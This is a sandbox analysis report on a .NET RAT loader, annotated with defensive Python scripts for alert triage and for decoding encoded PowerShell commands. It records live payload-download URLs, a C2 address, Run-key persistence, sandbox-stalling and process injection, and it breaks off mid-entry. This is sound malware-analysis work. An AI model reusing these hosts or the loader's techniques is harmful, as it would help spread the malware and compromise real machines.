Summary | ZeroBOX

Rckjlz.exe

Tags: Generic Malware, Downloader, Antivirus, Code injection, DGA, Escalate privileges, Socket, ScreenShot, KeyLogger, Create Service, SMTP, Internet API, DNS, Anti_VM, Sniff Audio, GIF Format, .NET EXE, PE32, PE File, AntiVM, AntiDebug

Category: FILE
Machine: s1_win7_x6401
Started: Oct. 23, 2022, 11:51 a.m. (sandbox local time; the HTTP Date header captured below reads 02:53 GMT, so the sandbox clock is UTC+9)
Completed: Oct. 23, 2022, 11:54 a.m.
Size: 192.0KB
Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5: 54e5e90fbafdf6f051f2c89da50a4b95
SHA256: e4d62d22644bd8f7b85b47328cbac771dd76473902ac2a92cb3bb06ff7ed091a
CRC32: 8D8C7CE3
ssdeep: 1536:bB+R6Ywvj1k3w45lEdhKzoUSFeuiS2FIlKbz0PEziNQKjoa:tAwvj1Mw4shKzoUSFeuiS2FIIcwKoa
Yara
  • IsPE32 - (no description)
  • Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT
  • Is_DotNET_EXE - (no description)
  • PE_Header_Zero - PE File Signature

IP Address Status Action
107.174.212.121 Active Moloch
107.175.247.199 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 107.175.247.199:80 -> 192.168.56.101:49161 2017962 ET MALWARE PE EXE or DLL Windows file download disguised as ASCII A Network Trojan was detected
TCP 107.175.247.199:80 -> 192.168.56.101:49161 2022640 ET MALWARE PE EXE or DLL Windows file download Text M2 A Network Trojan was detected
TCP 107.175.247.199:80 -> 192.168.56.101:49161 2035769 ET HUNTING [TW] Likely Hex Executable String Misc activity
TCP 192.168.56.101:49167 -> 107.175.247.199:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 192.168.56.101:49167 -> 107.175.247.199:80 2022550 ET MALWARE Possible Malicious Macro DL EXE Feb 2016 A Network Trojan was detected
TCP 107.175.247.199:80 -> 192.168.56.101:49167 2022050 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 A Network Trojan was detected
TCP 107.175.247.199:80 -> 192.168.56.101:49167 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 107.175.247.199:80 -> 192.168.56.101:49167 2022051 ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 A Network Trojan was detected
TCP 107.175.247.199:80 -> 192.168.56.101:49167 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 107.175.247.199:80 -> 192.168.56.101:49167 2035769 ET HUNTING [TW] Likely Hex Executable String Misc activity
TCP 107.175.247.199:80 -> 192.168.56.101:49161 2012252 ET SHELLCODE Common 0a0a0a0a Heap Spray String Executable code was detected
TCP 107.175.247.199:80 -> 192.168.56.101:49167 2012252 ET SHELLCODE Common 0a0a0a0a Heap Spray String Executable code was detected
TCP 192.168.56.101:49177 -> 107.174.212.121:5005 906200095 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (BitRAT) undefined
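The alert rows above are flattened "Flow SID Signature Category" text, which makes it easy to miss that all the HTTP download alerts point at one host on port 80 while the JA3 hit points at a second host on port 5005. The following is an added triage helper, not part of the ZeroBOX report or its tooling: it parses rows in exactly this layout, decides which side of each flow is the sandbox (the 192.168.56.0/24 range is an assumption taken from the guest address in the rows) and groups the external endpoints by the SIDs and signature families that fired against them. The embedded rows are a constructed subset copied from the table above.

```python
"""Group Suricata alert rows (as printed by the sandbox) by external endpoint.

Added example; not code from the ZeroBOX report. Assumes the sandbox guest lives in
192.168.56.0/24 (the guest address in the rows is 192.168.56.101).
"""
import re
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Constructed input: five rows copied verbatim from the report's alert table.
ALERT_ROWS = """\
TCP 107.175.247.199:80 -> 192.168.56.101:49161 2017962 ET MALWARE PE EXE or DLL Windows file download disguised as ASCII A Network Trojan was detected
TCP 192.168.56.101:49167 -> 107.175.247.199:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 107.175.247.199:80 -> 192.168.56.101:49167 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 107.175.247.199:80 -> 192.168.56.101:49161 2012252 ET SHELLCODE Common 0a0a0a0a Heap Spray String Executable code was detected
TCP 192.168.56.101:49177 -> 107.174.212.121:5005 906200095 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (BitRAT) undefined
"""

SANDBOX_NET = ip_network("192.168.56.0/24")  # assumption: host-only range of the VM

# Suricata classification names exactly as they appear at the end of each row; the
# free-text signature is whatever precedes the category.
CATEGORIES = (
    "A Network Trojan was detected",
    "Potential Corporate Privacy Violation",
    "Executable code was detected",
    "Potentially Bad Traffic",
    "Misc activity",
    "undefined",
)

ROW_RE = re.compile(
    r"^(?P<proto>\w+)\s+(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+"
    r"(?P<dst>[\d.]+):(?P<dport>\d+)\s+(?P<sid>\d+)\s+(?P<rest>.+)$"
)


def parse_alert(row):
    """Split one flattened row into its fields; raises on rows it cannot read."""
    m = ROW_RE.match(row.strip())
    if not m:
        raise ValueError(f"unparseable alert row: {row!r}")
    rest = m["rest"]
    category = next((c for c in CATEGORIES if rest.endswith(c)), None)
    signature = rest[: -len(category)].strip() if category else rest
    return {
        "proto": m["proto"],
        "src": (m["src"], int(m["sport"])),
        "dst": (m["dst"], int(m["dport"])),
        "sid": int(m["sid"]),
        "signature": signature,
        "category": category,
    }


def external_peer(alert):
    """Return ((ip, port) of the non-sandbox side, True if the sandbox initiated)."""
    if ip_address(alert["src"][0]) in SANDBOX_NET:
        return alert["dst"], True   # outbound request
    return alert["src"], False      # inbound (server response) packet


def summarise(rows):
    """Map 'ip:port' of each external endpoint to the SIDs and families seen."""
    summary = defaultdict(lambda: {"sids": set(), "families": set()})
    for row in rows.splitlines():
        if not row.strip():
            continue
        alert = parse_alert(row)
        peer, _ = external_peer(alert)
        key = f"{peer[0]}:{peer[1]}"
        summary[key]["sids"].add(alert["sid"])
        # "ET MALWARE ...", "ET INFO ...", "SSLBL: ..." -> first two tokens
        summary[key]["families"].add(" ".join(alert["signature"].split()[:2]))
    return dict(summary)


if __name__ == "__main__":
    for peer, info in summarise(ALERT_ROWS).items():
        print(peer, sorted(info["sids"]), sorted(info["families"]))
```

Run against the full table the result is two pivots: 107.175.247.199:80 as the download host (ET MALWARE/INFO/POLICY/SHELLCODE/HUNTING families) and 107.174.212.121:5005 as the TLS C2 (SSLBL JA3). The "undefined" category on the SSLBL row is what Suricata prints for a rule without a classtype, so the parser treats it as a real category rather than failing on it.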

Suricata TLS

Flow: TLS 1.2, 192.168.56.101:49177 -> 107.174.212.121:5005
Issuer: CN=GH9ST
Subject: CN=GH9ST
Fingerprint: 0e:27:6e:bc:2d:52:a5:8a:4a:31:f1:c9:33:16:53:8b:85:24:af:a7
Issuer and Subject are identical, so the server certificate is self-signed, and this is the same flow that raised the SSLBL JA3 alert; the 20-byte (SHA-1) fingerprint and the CN are the useful pivots for the C2 on 107.174.212.121:5005.

Time & API Arguments Status Return Repeated

GetComputerNameW
computer_name: TEST22-PC
1 1 0   (13 identical calls)

GetComputerNameA
computer_name: TEST22-PC
1 1 0   (2 identical calls; call order was W x5, A, W x6, A, W x2)
Time & API Arguments Status Return Repeated

IsDebuggerPresent
0 0   (6 identical calls; every call returned 0, so no debugger was reported to the sample)
Time & API Arguments Status Return Repeated

CryptExportKey was called 50 times with the same shape every time: buffer: <INVALID POINTER> (most likely the size-query form of the call with a NULL output buffer, which is why status is still 1), flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 (PUBLICKEYBLOB), status 1, return 1, repeated 0. Exporting public keys this way is what .NET Framework's CryptoAPI-backed RSA class does when key parameters are read, so together with the AsyncRAT Yara match and the self-signed TLS channel this reads as RAT key set-up rather than theft of stored keys. Only crypto_handle varied, in this order:

crypto_handle: 0x0056b3c8 (2 calls)
crypto_handle: 0x0056b4c8 (1 call)
crypto_handle: 0x002ef070 (1 call)
crypto_handle: 0x002ef5f0 (3 calls)
crypto_handle: 0x002ef170 (6 calls)
crypto_handle: 0x002eec30 (3 calls)
crypto_handle: 0x002ef5f0 (3 calls)
crypto_handle: 0x002ef4f0 (1 call)
crypto_handle: 0x002ef5f0 (7 calls)
crypto_handle: 0x002eed70 (14 calls)
crypto_handle: 0x002ef9f0 (2 calls)
crypto_handle: 0x00c7b138 (2 calls)
crypto_handle: 0x00c7b238 (1 call)
crypto_handle: 0x00330d38 (1 call)
crypto_handle: 0x00330eb8 (3 calls)
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

Both exceptions below carry code 0xe0434f4e and are raised from inside clr.dll (each stack runs from _CorExeMain through clr.dll into KERNELBASE!RaiseException). That is a CLR-internal software exception used by the .NET runtime during managed start-up, not a fault in the sample and not an exploit; the bare addresses in the traces (0x71020c and 0x23101e2 and their neighbours) are JIT-compiled managed code that no module symbol covers, and they fall inside the RWX regions the process allocates in the NtAllocateVirtualMemory block below.

__exception__

stacktrace:
CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x72951194
LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x72822ba1
mscorlib+0x9f1e83 @ 0x721d1e83
0x71020c
0x7100c1
0x710068
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x727a2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x727b264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x727b2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728674ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72867610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x728f1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x728f1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x728f1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x728f416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7415f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x741d7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x741d4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xe0434f4e
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 4911900
registers.edi: 0
registers.eax: 4911900
registers.ebp: 4911980
registers.edx: 0
registers.ebx: 6120360
registers.esi: 5740304
registers.ecx: 2034736085
1 0 0

__exception__

stacktrace:
CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x722b1194
LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x72182ba1
mscorlib+0x9f1e3f @ 0x71b31e3f
0x23101e2
0x2310163
0x23100d5
0x2310068
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72102652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7211264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72112e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x721c74ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x721c7610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72251dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72251e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72251f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7225416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x741af5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73497f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73494de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xe0434f4e
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 2093204
registers.edi: 0
registers.eax: 2093204
registers.ebp: 2093284
registers.edx: 0
registers.ebx: 13321472
registers.esi: 13143280
registers.ecx: 3398238948
1 0 0
suspicious_features: GET method with no useragent header
suspicious_request: GET http://ripley.studio/loader/uploads/Yjnhiv.jpeg
suspicious_features: Connection to IP address
suspicious_request: GET http://107.175.247.199/loader/server.exe
request GET http://ripley.studio/loader/uploads/Yjnhiv.jpeg
request GET http://107.175.247.199/loader/server.exe
Both requests hit the same /loader/ tree, and 107.175.247.199 is the only port-80 peer in the capture. The Suricata hits "PE EXE or DLL Windows file download disguised as ASCII" and "Likely Hex Executable String" on the first flow (port 49161) are consistent with the ".jpeg" being an executable encoded as text rather than an image, while server.exe on the second flow (port 49167) is served as a plain PE (see the recv buffer below).
Time & API Arguments Status Return Repeated

All 50 calls in this block are made in the sample's own process: process_identifier 2548, process_handle 0xffffffff (the current-process pseudo-handle), protection 64 (PAGE_EXECUTE_READWRITE), stack_dep_bypass 0, stack_pivoted 0, status 1, return 0, repeated 0. Self-process RWX pages are what the .NET JIT and the CLR's loader heaps look like from outside, so on their own they are weak evidence. The two NtProtectVirtualMemory targets (0x727a1000, 0x727a2000) lie inside clr.dll, whose base the exception stack traces above put at 0x727a0000. The cross-process allocations that actually indicate injection are in the later memory block (process_handle 0x224, 0x2e4, 0x374).

NtAllocateVirtualMemory  base_address: 0x00650000  region_size: 1835008  allocation_type: 8192 (MEM_RESERVE)  heap_dep_bypass: 0
NtAllocateVirtualMemory  base_address: 0x007d0000  region_size: 4096  allocation_type: 4096 (MEM_COMMIT)  heap_dep_bypass: 1
NtProtectVirtualMemory   base_address: 0x727a1000  length: 4096  heap_dep_bypass: 0
NtProtectVirtualMemory   base_address: 0x727a2000  length: 4096  heap_dep_bypass: 0
NtAllocateVirtualMemory  base_address: 0x02140000  region_size: 1966080  allocation_type: 8192 (MEM_RESERVE)  heap_dep_bypass: 0
NtAllocateVirtualMemory  base_address: 0x022e0000  region_size: 4096  allocation_type: 4096 (MEM_COMMIT)  heap_dep_bypass: 1

The remaining 44 NtAllocateVirtualMemory calls are all allocation_type 4096 (MEM_COMMIT), heap_dep_bypass 1, region_size 4096 unless noted, in call order:
0x00362000, 0x003a5000, 0x003ab000, 0x003a7000, 0x0037c000, 0x00710000, 0x00396000, 0x0039a000, 0x00397000, 0x0036a000, 0x0039b000, 0x00711000 (12288), 0x00714000, 0x00715000, 0x00716000 (8192), 0x00718000 (20480), 0x0071d000, 0x044af000, 0x044a0000, 0x0037d000, 0x0071e000, 0x0071f000, 0x044e0000, 0x044e1000, 0x044e2000, 0x0036c000, 0x0037e000, 0x044e3000, 0x0037f000, 0x04570000, 0x044e4000, 0x044e5000, 0x0037a000, 0x044e6000, 0x049b0000, 0x044e7000, 0x044e8000, 0x04571000, 0x044e9000, 0x044ea000, 0x044eb000, 0x0039c000, 0x044ec000, 0x044ed000
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 13318037504
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\agent.pyw - 바로 가기.lnk
("바로 가기" is Korean for "Shortcut", i.e. the default "<name> - Shortcut.lnk" name on a Korean-locale VM. agent.pyw is the Cuckoo guest agent that ZeroBOX, a Cuckoo derivative, starts from the Startup folder, so this hit almost certainly records the sample enumerating the Startup folder, not a file it dropped.)
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
(the literal, unexpanded %ProgramData% shows the path was built without environment-variable expansion, so it landed under %TEMP%)
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
cmdline Powershell -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
The -enc argument is base64 of UTF-16LE text and decodes to: Start-Sleep -Seconds 50. A 50-second idle is harmless on a real host but consumes a large share of a three-minute sandbox run (this one lasted 11:51 to 11:54), which is the usual reason a loader spawns it.
Time & API Arguments Status Return Repeated

ShellExecuteExW
show_type: 0 (SW_HIDE: the PowerShell window is not shown)
filepath_r: Powershell
parameters: -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
filepath: Powershell
1 1 0   (2 identical calls, launching the encoded Start-Sleep command listed under cmdline above)
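PowerShell's -EncodedCommand takes base64 of UTF-16LE text, so a plain base64 decode of the argument above shows every other byte as a NUL and most one-liner decoders get it wrong. The following is an added example, not code from the ZeroBOX report: it pulls the encoded argument out of a Windows command line, decodes it correctly, and applies the small triage rule a practitioner would want here, namely how many seconds the decoded script spends in Start-Sleep relative to an assumed sandbox window (120 s is an assumption, chosen from the roughly three-minute run shown in this report). The command line embedded in the block is the one from the report.

```python
"""Decode PowerShell -enc arguments and flag sleep-based sandbox evasion.

Added example, not part of the ZeroBOX report. The 120-second sandbox window and the
"a quarter of the window" threshold are assumptions for illustration.
"""
import base64
import re
import shlex

# Constructed input: the encoded command from the report, verbatim.
SAMPLE_CMDLINE = (
    "powershell.exe -enc "
    "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA=="
)

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_FLAG_RE = re.compile(r"^[-/](e|ec|enc|encoded|encodedcommand)$", re.IGNORECASE)

# Start-Sleep -Seconds N, Start-Sleep -s N, Start-Sleep N, or the "sleep" alias.
# -Milliseconds is deliberately not matched; it never buys enough time to matter.
SLEEP_RE = re.compile(
    r"(?:Start-Sleep|sleep)\s+(?:-s(?:econds)?\s+)?(?P<n>\d+)", re.IGNORECASE
)


def decode_encoded_command(cmdline):
    """Return the decoded script text, or None if the command line has no -enc."""
    # posix=False keeps Windows paths intact (no backslash escaping) and leaves
    # quotes on quoted tokens, which is fine because only the flag and its
    # argument are needed.
    tokens = shlex.split(cmdline, posix=False)
    for i, tok in enumerate(tokens[:-1]):
        if ENC_FLAG_RE.match(tok):
            raw = base64.b64decode(tokens[i + 1].strip('"'), validate=True)
            if len(raw) % 2:
                raise ValueError("encoded command is not valid UTF-16LE")
            return raw.decode("utf-16-le")
    return None


def sleep_seconds(script):
    """Total seconds the script explicitly sleeps."""
    return sum(int(m["n"]) for m in SLEEP_RE.finditer(script))


def triage(cmdline, sandbox_window=120):
    """Decode and score one command line."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return {"encoded": False}
    secs = sleep_seconds(script)
    return {
        "encoded": True,
        "script": script,
        "sleep_seconds": secs,
        # Anything that idles for a quarter of the analysis window or more is
        # treated as stalling (assumed threshold).
        "likely_sandbox_evasion": secs >= sandbox_window // 4,
    }


if __name__ == "__main__":
    print(triage(SAMPLE_CMDLINE))
```

The decoder is deliberately strict (validate=True, even byte count): an -enc argument that does not decode cleanly is itself worth a look, because some loaders pad or mangle the argument to break naive decoders.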
Time & API Arguments Status Return Repeated

MoveFileWithProgressW
newfilepath_r: C:\Users\test22\AppData\Local\svcsvc\svcsvc.exe
flags: 3 (MOVEFILE_REPLACE_EXISTING | MOVEFILE_COPY_ALLOWED)
oldfilepath_r: C:\Users\test22\AppData\Local\Temp\\Rckjlz.exe
newfilepath: C:\Users\test22\AppData\Local\svcsvc\svcsvc.exe
oldfilepath: C:\Users\test22\AppData\Local\Temp\Rckjlz.exe
1 1 0
The sample moves itself out of %TEMP% into %LOCALAPPDATA%\svcsvc\svcsvc.exe (the *_r fields are the raw arguments, hence the doubled backslash); this path belongs on the same collection list as the two Run-key targets at the end of the report.
Time & API Arguments Status Return Repeated

GetAdaptersAddresses
flags: 15 (GAA_FLAG_SKIP_UNICAST | SKIP_ANYCAST | SKIP_MULTICAST | SKIP_DNS_SERVER)
family: 0 (AF_UNSPEC)
111 0   (return 111 = ERROR_BUFFER_OVERFLOW, the expected result of the first, buffer-sizing call; adapter enumeration is routine host fingerprinting for a RAT check-in)
Time & API Arguments Status Return Repeated

recv
buffer (first 1024 bytes of the server.exe response; the body is binary and only its recoverable ASCII is shown):
HTTP/1.1 200 OK
Date: Sun, 23 Oct 2022 02:53:08 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Thu, 22 Sep 2022 05:54:20 GMT
ETag: "4ac400-5e93db1463b00"
Accept-Ranges: bytes
Content-Length: 4899840
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program

MZ ... This program cannot be run in DOS mode. ... PE ... .text ... .rsrc ... .reloc ...
(a PE executable: MZ and PE headers followed by .text, .rsrc and .reloc sections; the first field of the Apache ETag, 4ac400, is the file size in hex and equals the Content-Length of 4,899,840 bytes)
received: 1024
socket: 720
1 1024 0

InternetReadFile
buffer: (the response body from the recv above, starting at the MZ header)
request_handle: 0x00cc000c
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
1 1 0   (5 identical calls)

LookupPrivilegeValueW
system_name:
privilege_name: SeShutdownPrivilege
1 1 0
LookupPrivilegeValueW only resolves a privilege name to its LUID. The step that matters for opening other processes, enabling SeDebugPrivilege with AdjustTokenPrivileges, is not listed in this excerpt, so read these calls as intent that fits the cross-process allocations below rather than as confirmed privilege escalation.
url https://curl.haxx.se/docs/http-cookies.html   (the header line libcurl writes into its Netscape-format cookie jar, i.e. a libcurl-based component in the scanned memory, not a URL the sample requested)

Yara rule matches (the report repeats its rule list once per scanned object, so the same rules appear several times below):
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Possibly employs anti-virtualization techniques rule vmdetect
description Bypass DEP rule disable_dep
description Create a windows service rule Create_Service
description Communication using DGA rule Network_DGA
description Communications over RAW Socket rule Network_TCP_Socket
description Take ScreenShot rule ScreenShot
description Communications use DNS rule Network_DNS
description Communications smtp rule network_smtp_raw
description Match Windows Inet API call rule Str_Win32_Internet_API
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Run a KeyLogger rule KeyLogger
description File Downloader rule Network_Downloader
description Escalate privileges rule Escalate_priviledges
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 604
region_size: 258048
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000224
1 0 0

NtAllocateVirtualMemory

process_identifier: 2248
region_size: 4923392
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002e4
1 0 0

NtProtectVirtualMemory

process_identifier: 2248
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000
process_handle: 0x0000025c
3221225496 0

NtAllocateVirtualMemory

process_identifier: 2920
region_size: 3989504
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000374
1 0 0
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

information_class: 8 (SystemProcessorPerformanceInformation)
1 0 0
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Qusfukpzsf reg_value "C:\Users\test22\AppData\Roaming\Vvxyeheuij\Qusfukpzsf.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Fsaxd reg_value "C:\Users\test22\AppData\Roaming\Fdqudm\Fsaxd.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\svcsvc reg_value C:\Users\test22\AppData\Local\svcsvc\svcsvc.exe
Time & API Arguments Status Return Repeated

SetWindowsHookExW

thread_identifier: 0
callback_function: 0x0050f84a
hook_identifier: 14 (WH_MOUSE_LL)
module_address: 0x00000000
1 721329 0
Process injection Process 2248 manipulating memory of non-child process 2248
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2248
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000
process_handle: 0x0000025c
3221225496 0

NtProtectVirtualMemory

process_identifier: 2248
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8
protection: 72319744 (PAGE_GUARD|PAGE_NOCACHE)
base_address: 0x00000000
process_handle: 0x0000025c
3221225541 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $Z/.Nf}Nf}Nf}ªÒ—}Nf}ªÒ•}†Nf}ªÒ”}Nf}%e| Nf}%c|"Nf}%b|<Nf}ûc|Nf}ñ­}Nf}Ng}mNf}‰o|Nf}‰d|Nf}RichNf}PEL$î0_à VPž®p@ð@€,hxÀ\&€98:¸9@p˜.text{UV `.rdata„pZ@@.dataÈ€\@À.gfidsˆ l@@.tls °p@À.reloc\&À(r@B
base_address: 0x00400000
process_identifier: 604
process_handle: 0x00000224
1 1 0

WriteProcessMemory

buffer: Ìa±aV;fUfV£fV•ëVFL‡¦zšfBÅ1Å>IæHVV¥¤ø£]f)f@‡úböÄM—G—G\‹h7@8ǜ â}lÑ» Xì ªÍ€gÖá4>„?_^dŸ±oqoÐoÖJJêðïôðïðï ðï#$"JJ'o6o<#$"A@D#$"HGKoR^„ƒ‚€~}|{zyhg†•”“’‘~{ŽŒ‹œ¨ãÅÄÃÂÁðïÇcž°³îüû íäìäøää éêö9<8;ÊËÌÍÎÏÐÑÒÓÔ†…Ù†…  b Er4N]Z[ Y
base_address: 0x0043a000
process_identifier: 604
process_handle: 0x00000224
1 1 0

WriteProcessMemory

buffer: €
base_address: 0x0043b000
process_identifier: 604
process_handle: 0x00000224
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 604
process_handle: 0x00000224
1 1 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELiþScà ÒGðþïG H@  K`…´ïGJHÞìK  H.textÐG ÒG `.rsrcÞìHîÔG@@.reloc KÂJ@B
base_address: 0x00400000
process_identifier: 2248
process_handle: 0x000002e4
1 1 0

WriteProcessMemory

buffer: ðG 0
base_address: 0x008b0000
process_identifier: 2248
process_handle: 0x000002e4
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2248
process_handle: 0x000002e4
1 1 0

WriteProcessMemory

